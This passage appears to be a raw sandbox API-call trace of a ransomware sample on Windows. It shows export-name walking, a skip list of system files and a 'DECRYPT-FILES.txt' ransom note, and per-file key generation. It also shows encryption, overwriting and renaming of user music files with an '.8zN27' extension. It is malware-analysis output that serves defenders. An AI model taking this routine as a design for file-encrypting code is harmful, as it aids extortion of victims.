(lpString="ENABLETHREADPROFILING") returned 21 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.619] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.619] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.619] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.619] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.619] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.619] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.620] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.620] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.620] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.620] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.620] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.620] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.620] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.620] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.620] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.620] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\eT6JvIsf5PzgpcQ4Oo.mp3") returned 63 [0085.620] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\eT6JvIsf5PzgpcQ4Oo.mp3.8zN27") returned 69 [0085.620] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\eT6JvIsf5PzgpcQ4Oo.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\et6jvisf5pzgpcq4oo.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\eT6JvIsf5PzgpcQ4Oo.mp3.8zN27" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\et6jvisf5pzgpcq4oo.mp3.8zn27"), dwFlags=0x0) returned 1 [0085.630] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.630] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.630] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.631] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1983890, ftCreationTime.dwHighDateTime=0x1d4d522, ftLastAccessTime.dwLowDateTime=0xd0992ba0, ftLastAccessTime.dwHighDateTime=0x1d4cd94, ftLastWriteTime.dwLowDateTime=0xd0992ba0, ftLastWriteTime.dwHighDateTime=0x1d4cd94, nFileSizeHigh=0x0, nFileSizeLow=0x8326, dwReserved0=0x0, dwReserved1=0x0, cFileName="F_CLZ29qIc0hWf92.wav", cAlternateFileName="F_CLZ2~1.WAV")) returned 1 [0085.631] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav", lpString2="DECRYPT-FILES.txt") returned 1 [0085.631] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav", lpString2="autorun.inf") returned 1 [0085.631] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav", lpString2="boot.ini") returned 1 [0085.631] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav", lpString2="desktop.ini") returned 1 [0085.631] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav", lpString2="ntuser.dat") returned -1 [0085.631] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav", lpString2="iconcache.db") returned -1 [0085.631] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav", lpString2="bootsect.bak") returned 1 [0085.631] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav", lpString2="ntuser.dat.log") returned -1 [0085.631] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav", lpString2="thumbs.db") returned -1 [0085.631] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav", lpString2="Bootfont.bin") returned 1 [0085.631] lstrlenW (lpString="F_CLZ29qIc0hWf92.wav") returned 20 [0085.631] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0085.631] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0085.631] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0085.631] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0085.631] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0085.631] lstrlenW (lpString="F_CLZ29qIc0hWf92.wav") returned 20 [0085.631] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" [0085.631] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpString2="F_CLZ29qIc0hWf92.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\F_CLZ29qIc0hWf92.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\F_CLZ29qIc0hWf92.wav" [0085.631] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.631] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\F_CLZ29qIc0hWf92.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\f_clz29qic0hwf92.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.632] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=33574) returned 1 [0085.632] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.632] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.632] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.632] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.632] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.632] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.632] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.633] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.633] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.634] CloseHandle (hObject=0x42c) returned 1 [0085.634] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.634] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.635] CloseHandle (hObject=0x0) returned 0 [0085.635] CloseHandle (hObject=0x428) returned 1 [0085.635] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.635] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.636] GetTickCount () returned 0x114ddd2 [0085.636] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.636] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.636] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.636] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.636] lstrlenA (lpString="kernel32.dll") returned 12 [0085.637] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.637] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.637] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.637] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.637] lstrlenA (lpString="ADDATOMA") returned 8 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.637] lstrlenA (lpString="ADDATOMW") returned 8 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.637] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.637] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.637] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.637] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.637] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.637] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.637] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.637] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.637] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.637] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.637] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.637] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.638] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.638] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.638] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.638] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.638] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.638] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.638] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.638] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.638] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.638] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.638] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.638] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.638] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.638] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.638] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.638] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.638] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.638] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.638] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.638] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.639] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.639] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.639] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.639] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.639] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.639] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.639] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.639] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.639] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.639] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.639] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.639] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.639] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.639] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.639] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.639] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.639] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.639] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.640] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.640] lstrlenA (lpString="BEEP") returned 4 [0085.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.640] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.640] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.640] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.640] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.640] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.640] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.640] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.640] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.640] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.640] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.641] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.641] lstrlenA (lpString="CANCELIO") returned 8 [0085.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.641] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.641] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.641] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.642] lstrlenA (lpString="CANCELTIMERQUEUETIMER") 